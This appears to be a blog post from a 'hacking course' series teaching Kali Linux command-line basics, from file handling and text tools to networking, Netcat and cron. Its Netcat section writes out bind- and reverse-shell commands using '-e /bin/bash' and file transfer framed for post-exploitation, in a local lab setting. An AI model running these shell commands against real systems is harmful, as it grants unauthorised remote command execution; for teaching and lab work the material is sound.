9 Using Kali Linux Command Line , Free Hacking Complete Course Step By Step

-
Free Hacking Complete Course Step By Step

Creating a New File or Directory

To create a new, empty file called myfile, use the touch command.

root@kali:# touch myfile

To create a new directory in your current working directory, enter mkdir directory as shown here.

root@kali:~# mkdir mydirectory
root@kali:~# ls
Desktop        mydirectory        myfile
root@kali:~# cd mydirectory/

Use ls to confirm that the new directory has been created, and then change to mydirectory using cd.

Copying, Moving, and Removing Files

To copy a file, use the cp command as shown here.

root@kali:/mydirectory# cp /root/myfile myfile2

The syntax is cp source destination. When using cp, the original file is left in place, and a copy is made at the desired destination.

Similarly, you can move a file from one location to another using the mv command. The syntax is identical to cp, but this time the file is removed from the source location.

You can remove a file from the filesystem by entering rm file. To remove files recursively use the -r command.
WARNING : Be careful when removing files, particularly recursively! Some hackers joke that the first command to teach Linux beginners is rm -rf from the root directory, which forcibly deletes the entire filesystem. This teaches new users the power of performing actions as root. Don’t try that at home!

Adding Text to a File

The echo command echoes what you enter to the terminal, as shown here.

root@kali:/mydirectory# echo hello Accused Hacking Group
hello Accused Hacking Group

To save text to a file, you can redirect your input to a file instead of to the terminal with the > symbol.

root@kali:/mydirectory# echo hello Accused Hacking Group > myfile

To see the contents of your new file you can use the cat command.

root@kali:/mydirectory# cat myfile
hello Accused Hacking Group

Now echo a different line of text into myfile as shown next.

root@kali:# echo hello Accused Hacking again > myfile
root@kali:/mydirectory# cat myfile
hello Accused Hacking Group again

The > overwrites the previous contents of the file. If you echo another line into myfile, that new line overwrites the output of the previous command. As you can see, the contents of myfile now reads hello Accused Hacking Group.

Appending Text to a File

To append text to a file, use >> as shown here.

root@kali:/mydirectory# echo hello Accused Hacking Group a third time >> myfile
root@kali:/mydirectory# cat myfile
hello Accused Hacking Group again
hello Accused Hacking Group a third time

As you can see, appending preserves the previous contents of the file.

File Permissions

If you look at the long output of ls -l on myfile, you can see the current permissions for myfile.

root@kali:~/mydirectory# ls -l myfile
-rw-r--r-- 1 root root 47 Apr 23 21:15 myfile

From left to right you see the file type and permissions (-rw-r—r--), the number of links to the file (1), the user and group that own the file (root), the file size (47 bytes), the last time the file was edited (April 23, 21:15), and finally the filename (myfile).

Linux files have permissions to read (r), write (w), and execute (x) and three sets of user permissions: permissions for the owner, the group, and all users. The first three letters denote the permissions for the owner, the following three denote the permissions for the group, and the final three denote the permissions for all users. Since you created myfile from the root user account, the file is owned by user root and group root, as you can see in the output with root root. User root has read and write permissions for the file (rw). Other users in the group, if there are any, can read the file (r) but not write to or execute it. The last r shows that all users on the filesystem can read the file.

To change permissions on a file, use the chmod command. You can use chmod to specify permissions for the owner, the group, and the world. When specifying permissions use the numbers from 0 through 7 as shown in Table.

Integer Value          Permissions                       Binary Representation
7                             full                                        111
6                             read and write                     110
5                             read and execute                 101
4                             read only                              100
3                             write and execute                011
2                             write only                             010
1                             execute only                         001
0                             none                                      000

When entering new file permissions, you use one digit for the owner, one for the group, and one for world. For example, to give the owner full permissions but the group and the world no permissions to read, write, or execute a file, use chmod 700 like this:

root@kali:~/mydirectory# chmod 700 myfile
root@kali:~/mydirectory# ls -l myfile
-rwx------u 1 root root 47 Apr 23 21:15 myfile

Now when you run the ls -l command on myfile, you can see that root has read, write, and execute (rwx) permissions and the other sets are blank u. If you try to access the file as any user other than root, you’ll get a permission denied error.

Editing Files

Perhaps no debate brings out such passion among Linux users as which is the best file editor. We’ll look at the basics of using two popular editors, vi and nano, beginning with my favorite, nano.

root@kali:~/mydirectory# nano testfile.txt

Once in nano you can begin adding text to a new file called testfile.txt. When you open nano, you should see a blank file with help information for nano shown at the bottom of the screen, as shown here.

                                                            [ New File ]
^G Get Help    ^O WriteOut    ^R Read File    ^Y Prev Page    ^K Cut Text         ^C Cur Pos
^X Exit            ^J Justify         ^W Where Is    ^V Next Page    ^U UnCut Text    ^T To Spell

To add text to the file, just start typing.

Searching for Text

To search for text in a file, use ctrl-W, and then enter the text to search for at the search prompt as shown next.

--snip--
Search:Accused
^G Get Help    ^Y First Lin    ^T Go To Line    ^W Beg of ParM-J FullJstifM-B Backwards    ^C Cancel    ^V Last Line    ^R Replace    ^O End of ParM-C Case SensM-R Regexp

Nano should find the text Accused if the word is in the file. To exit, press ctrl-X. You will be prompted to save the file or lose the changes, as shown here:

--snip--
Save modified buffer (ANSWERING "No" WILL DESTROY CHANGES) ? Y
Y Yes
N No         ^C Cancel

Enter Y to save the file. Now we’ll edit the file with the vi editor.

Editing a File with vi

Add the text in Listing 2-5 to testfile.txt. In addition to the contents of the file, at the bottom of the vi screen you see some information including the filename, number of lines, and the current cursor position.

root@kali:~/mydirectory# vi testfile.txt
hi
Accused Hacking Group
we
are
teaching
pentesting and Hacking
today
~
"testfile.txt" 7L, 69C                                                 1,1
All

Unlike nano, you can’t just start editing the file once it is opened in vi. To edit a file, enter I to put vi into insert mode. You should see the word INSERT displayed at the bottom of your terminal. Once you’ve finished making changes, press esc to exit insert mode and return to command mode. Once in command mode, you can use commands to edit your text.
For example, position the cursor at the line we and enter dd to delete the word we from the file.

To exit vi, enter :wq to tell vi to write the changes to the file and quit, as shown in Listing.

hi
Accused Hacking Group
we
are
teaching
pentesting and Hacking
today

:wq

NOTE To learn more about available commands for vi and nano, read the corresponding man pages. Which editor you use daily is up to you. Throughout this blog we’ll use nano to edit files, but feel free to substitute your editor of choice.

Data Manipulation

Now for a bit of data manipulation. Enter the text in Listing in myfile using your desired text editor. The file lists some of my favorite security conferences and the months when they typically happen.

root@kali:~/mydirectory# cat myfile
1 Derbycon September
2 Shmoocon January
3 Brucon September
4 Blackhat July
5 Bsides *
6 HackerHalted October
7 Hackcon April

Using grep

The command grep looks for instances of a text string in a file. For example, to search for all instances of the string September in our file, enter grep September myfile as follows.

root@kali:~/mydirectory# grep September myfile
1 Derbycon September
3 Brucon September

As you can see, grep tells us that Derbycon and Brucon are in September. 
Now suppose you want only the names of the conferences in September but not the number or the month. You can send the output of grep to another command for additional processing using a pipe (|). The cut command allows you to take each line of input, choose a delimiter, and print specific fields. For example, to get just the names of conferences that run in September you can grep for the word September as you did previously. Next, you pipe (|) the output to cut, where you specify a space as the delimiter with the -d option and say you want the second field with the field (-f) option, as shown here.

root@kali:~/mydirectory# grep September myfile | cut -d " " -f 2
Derbycon
Brucon

The result, as you can see, is that by piping the two commands together you get just the conferences Derbycon and Brucon.

Using sed

Another command for manipulating data is sed. Entire blog have been written about using sed, but we’ll cover just the basics here with a simple example of finding a specific word and replacing it.
The sed command is ideal for editing files automatically based on certain patterns or expressions. Say, for instance, you have a very long file, and you need to replace every instance of a certain word. You can do this quickly and automatically with the sed command.
In the language of sed, a slash (/) is the delimiter character. For example, to replace all instances of the word Blackhat with Defcon in myfile, enter sed 's/Blackhat/Defcon/' myfile, as shown in Listing.

root@kali:~/mydirectory# sed 's/Blackhat/Defcon/' myfile
1 Derbycon September
2 Shmoocon January
3 Brucon September
4 Defcon July
5 Bsides *
6 HackerHalted October
7 Hackcon April

Pattern Matching with awk

Another command line utility for pattern matching is the awk command. 
For example, if you want to find conferences numbered 6 or greater, you can use awk to search the first field for entries greater than 5, as shown here.

root@kali:~/mydirectory# awk '$1 >5' myfile
6 HackerHalted October
7 Hackcon April

Or, if you want only the first and third words in every line, you can enter awk '{print $1,$3;}' myfile, as shown in Listing.

root@kali:~/mydirectory# awk '{print $1,$3;}' myfile
1 September
2 January
3 September
4 July
5 *
6 October
7 April

NOTE We’ve looked at only simple examples of using these data manipulation utilities in this section. To get more information, consult the man pages. These utilities can be powerful time-savers.

Managing Installed Packages

On Debian-based Linux distributions such as Kali Linux, you can use the Advanced Packaging Tool (apt) to manage packages. To install a package, enter apt-get install package. For example, to install Raphael Mudge’s frontend for Metasploit, Armitage, in Kali Linux, enter the following:

root@kali:~# apt-get install armitage

It’s that easy: apt installs and configures Armitage for you.
Updates are regularly released for the tools installed on Kali Linux. To get the latest versions of the packages already installed, enter apt-get upgrade. The repositories Kali uses for packages are listed in the file /etc/apt/sources .list. To add additional repositories, you can edit this file and then run the command apt-get update to refresh the database to include the new repositories.

Note : This blog is built off the base install of Kali 1.0.6 unless otherwise noted in previous blog, so in order to follow along with the blog as is, don’t update Kali.

Processes and Services

In Kali Linux you can start, stop, or restart services using the service command.
For example, to start the Apache web server, enter service apache2 start as shown next.

root@kali:~/mydirectory# service apache2 start
[....] Starting web server: apache2: Could not reliably determine the server's
fully qualified domain name, using 127.0.1.1 for ServerName
. ok

Likewise, to stop the MySQL database server, enter service mysql stop.

Managing Networking

When setting up the Kali Linux virtual machines in previous blog, you used the ifconfig command to view network information as shown in Listing.

root@kali:~#  ifconfig
eth0 (1)            Link encap:Ethernet HWaddr 00:0c:29:df:7e:4d
                        inet addr:192.168.20.9 (2) Bcast:192.168.20.255 Mask:255.255.255.0 (3)
                        inet6 addr: fe80::20c:29ff:fedf:7e4d/64 Scope:Link
                        UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
                        RX packets:1756332 errors:930193 dropped:17 overruns:0 frame:0
                        TX packets:1115419 errors:0 dropped:0 overruns:0 carrier:0
                        collisions:0 txqueuelen:1000
                        RX bytes:1048617759 (1000.0 MiB) TX bytes:115091335 (109.7 MiB)
                        Interrupt:19 Base address:0x2024
--snip--

From the output of ifconfig you can glean a lot of information about your system’s network state. For one, the network interface is called eth0 (1). The IPv4 address (inet addr) that my Kali box uses to talk to the network is 192.168.20.9 (2) (yours will probably differ). An IP address is a 32-bit label assigned to devices in a network. The IP address is named up of 4 octets, or 8-bit parts.

The address’s network mask, or netmask (Mask), at w identifies which parts of the IP address are part of the network and which parts belong to the host. In this case the netmask 255.255.255.0 tells you that the network is the first three octets, 192.168.20.

The default gateway is where your host routes traffic to other networks. Any traffic destined outside the local network will be sent to the default gateway for it to figure out where it needs to go.

root@kali:~# route
Kernel IP routing table
Destination     Gateway                    Genmask         Flags      Metric    Ref     Use     Iface
default             192.168.20.1 (1)       0.0.0.0             UG         0             0         0         eth0
192.168.20.0    *                               255.255.255.0 U            0             0         0         eth0

The route command output tells us that the default gateway is 192.168.20.1 u. This makes sense because the system with the IP address 192.168.20.1 is the wireless router in my home network. Take note of your own default gateway for use in the following section.

Setting a Static IP Address

By default, your network connection uses dynamic host configuration protocol (DHCP) to pull an IP address from the network. To set a static address, so that your IP address won’t change, you need to edit the file /etc/network/interfaces. Use your preferred editor to open this file. The default configuration file is shown in Listing.

# This file describes the network interfaces available on your system
# and how to activate them. For more information, see interfaces(5).
# The loopback network interface
auto lo
iface lo inet loopback

To give your system a static IP address you need to add an entry for the eth0 interface. Add the text shown in Listing to /etc/network/interfaces with the IP addresses changed to match your environment.

# This file describes the network interfaces available on your system
# and how to activate them. For more information, see interfaces(5).
# The loopback network interface
auto lo
iface lo inet loopback
auto eth0
iface eth0 inet static (1)
address 192.168.20.9
Using Kali Linux 69
netmask 255.255.255.0 (2)
gateway 192.168.20.1 (3)

You set the IP address for eth0 as static at (1). Use the IP address, netmask (2), and gateway (3) you found in the previous section to fill in the information in your file.
Once you’ve made these changes, restart networking with service networking restart so that the newly added static networking information will be used.

Viewing Network Connections

To view network connections, listening ports, and so on, use the netstat command. For example, you can see the programs listening on TCP ports by issuing the command netstat -antp, as shown in Listing. Ports are simply software-based network sockets that listen on the network to allow remote systems to interact with programs on a system.

root@kali:~/mydirectory# netstat -antp
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address             Foreign Address             State
PID/Program name
tcp6 0 0                                                            :::80 :::*                         LISTEN
15090/apache2

You see that the Apache web server you started earlier in the blog is listening on TCP port 80. (See the man page for other netstat options.)

Netcat: The Swiss Army Knife of TCP/IP Connections

As the man page notes, the Netcat tool is known as the Swiss Army knife for TCP/IP connections. It’s a versatile tool that we’ll utilize throughout this blog.
To see Netcat’s various options enter nc -h, as shown in Listing.

root@kali:~# nc -h
[v1.10-40]
connect to somewhere: nc [-options] hostname port[s] [ports] ...
listen for inbound: nc -l -p port [-options] [hostname] [port]
options:
-c shell commands as `-e'; use /bin/sh to exec [dangerous!!]
-e filename program to exec after connect [dangerous!!]
-b allow broadcasts
--snip--

Check to See If a Port Is Listening

Let’s have Netcat connect to a port to see if that port is listening for connections. You saw previously that the Apache web server is listening on port 80 on your Kali Linux system. Tell Netcat to attach to port 80 verbosely, or output rich, with the -v option as shown next. If you started Apache correctly, you should see the following when attempting to connect the service.

root@kali:~# nc -v 192.168.20.9 80
(UNKNOWN) [192.168.20.10] 80 (http) open

As you can see, Netcat reports that port 80 is indeed listening (open) on the network. (We’ll look more at open ports and why they are interesting in future discussion of port scanning.)
You can also listen on a port for an incoming connection using Netcat, as shown next.

root@kali:~# nc -lvp 1234
listening on [any] 1234 ...

You use the options l for listen, v for verbose, and p to specify the port to listen on.
Next, open a second terminal window and use Netcat to connect to the Netcat listener.

root@kali:~# nc 192.168.20.9 1234
hi Accused Hacking

Once you connect, enter the text hi Accused Hacking, and when you return to the listener’s terminal window, you see that a connection was received and your text was printed.

listening on [any] 1234 ...
connect to [192.168.20.9] from (UNKNOWN) [192.168.20.9] 51917
hi Accused Hacking

Close down both Netcat processes by pressing ctrl-C.

Opening a Command Shell Listener

Now for something a bit more interesting. When you set up your Netcat listener, use the -e flag to tell Netcat to execute /bin/bash (or start a Bash command prompt) when a connection is received. This allows anyone who connects to the listener to execute commands on your system, as shown next.

root@kali:~# nc -lvp 1234 -e /bin/bash
listening on [any] 1234 ...

Again, use a second terminal window to connect to the Netcat listener.

root@kali:~# nc 192.168.20.9 1234
whoami
root

You can now issue Linux commands to be executed by the Netcat listener. The whoami Linux command will tell you the current logged-in user. In this case, because the Netcat process was started by the root user, your commands will be executed as root.

NOTE : This is a simple example because both your Netcat listener and the connection are onthe same system. You could use another of your virtual machines, or even your host system, for this exercise as well.

Close down both Netcat processes again.

Pushing a Command Shell Back to a Listener

In addition to listening on a port with a command shell, you can also push a command shell back to a Netcat listener. This time set up the Netcat listener without the -e flag as shown next.

root@kali:~# nc -lvp 1234
listening on [any] 1234 ...

Now open a second terminal, and connect back to the Netcat listener you just created as shown here.

root@kali:~# nc 192.168.20.9 1234 -e /bin/bash

Connect with Netcat as usual, but this time use the -e flag to execute /bin/bash on the connection. Back in your first terminal you see a connection as shown next, and if you enter terminal commands, you will see them executed. (We’ll learn more about listening with /bin/bash on a local port and actively pushing /bin/bash with a connection, known as bind shells and reverse shells, respectively, in Future Blog.)

listening on [any] 1234 ...
connect to [192.168.20.9] from (UNKNOWN) [192.168.20.9] 51921
whoami
root

Now, one more thing with Netcat. This time, instead of outputting what comes into your listener to the screen, use > to send it to a file as shown next.

root@kali:~# nc -lvp 1234 > netcatfile
listening on [any] 1234 ...

In the second terminal you set up Netcat to connect, but this time you use the < symbol to tell it to send the contents of a file (myfile) over the Netcat connection. Give Netcat a second or two to finish, and then examine the contents of the file netcatfile created by your first Netcat instance. The contents should be identical to myfile.

root@kali:~# nc 192.168.20.9 1234 < mydirectory/myfile

You have used Netcat to transfer the file. In this case we’ve simply transferred the file from one directory to another, but you can imagine how this technique can be used to transfer files from system to system—a technique that often comes in handy in the post-exploitation phase of a pentest, once you have access to a system.

Automating Tasks with cron Jobs

The cron command allows us to schedule tasks to automatically run at a specified time. In the /etc directory in Kali, you can see several files and directories related to cron, as shown in Listing.

root@kali:/etc# ls | grep cron
cron.d
cron.daily
cron.hourly
cron.monthly
crontab
cron.weekly

The cron.daily, cron.hourly, cron.monthly, and cron.weekly directories specify scripts that will run automatically, every day, every hour, every month, or every week, depending on which directory you put your script in.
If you need more flexibility you can edit cron’s configuration file, /etc/ crontab. The default text is shown in Listing.

# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly (1)
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ) (2)
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#

The fields in a crontab are, from left to right, the minute, hour, day of the month, month, day of the week, user who will run the command, and, finally, the command to be run. To run a command every day of the week, every hour, and so on, you use an asterisk (*) instead of specifying a value for the column.

For example, look at the first crontab line at u, which runs the hourly cron jobs specified in /etc/cron.hourly. This crontab runs on the 17th minute of every hour every day of every month on every day of the week. The line at v says that the daily crontab (/etc/cron.daily) will be run at the 25th minute of the 6th hour of every day of every month on every day of the week. (For more flexibility, you can add a line here instead of adding to the hourly, daily,
weekly, or monthly lists.)

Summary

In this blog we’ve looked at some common Linux tasks. Navigating the Linux filesystem, working with data, and running services are all skills that will serve you well as you move through the rest of this blog. In addition, when attacking Linux systems, knowing which commands to run in a Linux environment will help you make the most of successful exploitation. You may want to automatically run a command periodically by setting up a cron job or use Netcat to transfer a file from your attack machine. You will use Kali Linux to run your attacks throughout this blog, and one of your target systems is Ubuntu Linux, so having the basics in place will make learning pentesting come more naturally.

In our last Blog we saw how Create files, Edit Files Adding a User and change permissions for a user in kali by terminal, our next tops will be Programming for Script Files that used for hacking. If you have not followed us yet, then do so so that you do not miss the upcoming topics. Click Here To Read Our Blogs From Getting Started.


Comments

Post a Comment

Popular posts from this blog

14 Creating Standalone Payloads with Msfvenom, Free Hacking Complete Course Step By Step

-
Image
Free Hacking Complete Course Step By Step Creating Standalone Payloads with Msfvenom In 2011, Msfvenom was added to Metasploit. Before Msfvenom, the tools Msfpayload and Msfencode could be used together to create standalone encoded Metasploit payloads in a variety of output formats, such as Windows executables and ASP pages. With the introduction of Msfvenom, the functionality of Msfpayload and Msfencode was combined into a single tool, though Msfpayload and Msfencode are still included in Metasploit. To view Msfvenom’s help page, enter msfvenom -h . So far with Metasploit, our goal has been to exploit a vulnerability in the target system and take control of the machine. Now we’ll do something a little different. Instead of relying on a missing patch or another security issue, we are hoping to exploit the one security issue that may never be fully patched: the users. Msfvenom allows you to build standalone payloads to run on a target system in an attempt to...
Read more

3 Configuring the Network for Virtual Machine, Hacking Complete Free Course Step By Step

-
Image
Hacking Free Complete Course Step By Step Configuring the Network for Virtual Machine After installing Kali Linux as a Virtual machine we must configuring the network for virtual machine because we’ll be using Kali Linux to attack our target systems over a network, we need to place all our virtual machines on the same virtual network. VMware offers three options for virtual network connections:   Bridged  NAT Host only.   You should choose the bridged option, but here’s a bit of information about each: The bridged network connects the virtual machine directly to the local network using the same connection as the host system. As far as the local network is concerned, our virtual machine is just another node on the network with its own IP address. NAT, short for network address translation, sets up a private network on the host machine. The private network translates outgoing traffic from the virtual machine to the local network. On the local network, traffic from the virt...
Read more

2 How to Create and Use Virtual Machines For Hacking, Hacking Complete Free Course Step By Step

-
Image
Hacking Free Complete Course Step By Step How to Create and Use Virtual Machines For Hacking Virtual machines allow you to run an operating system in an app window on your desktop that behaves like a full, separate computer. You can use them play around with different operating systems, run software your main operating system can’t, and try out apps in a safe, sandboxed environment. There are several good free virtual machine (VM) apps out there, which makes setting up a virtual machine something anybody can do. You’ll need to install a VM app, and have access to installation media for the operating system you want to install. What’s a Virtual Machine? A virtual machine app creates a virtualized environment—called, simply enough, a virtual machine—that behaves like a separate computer system, complete with virtual hardware devices. The VM runs as a process in a window on your current operating system. You can boot an operating system installer disc (or live CD) inside the...
Read more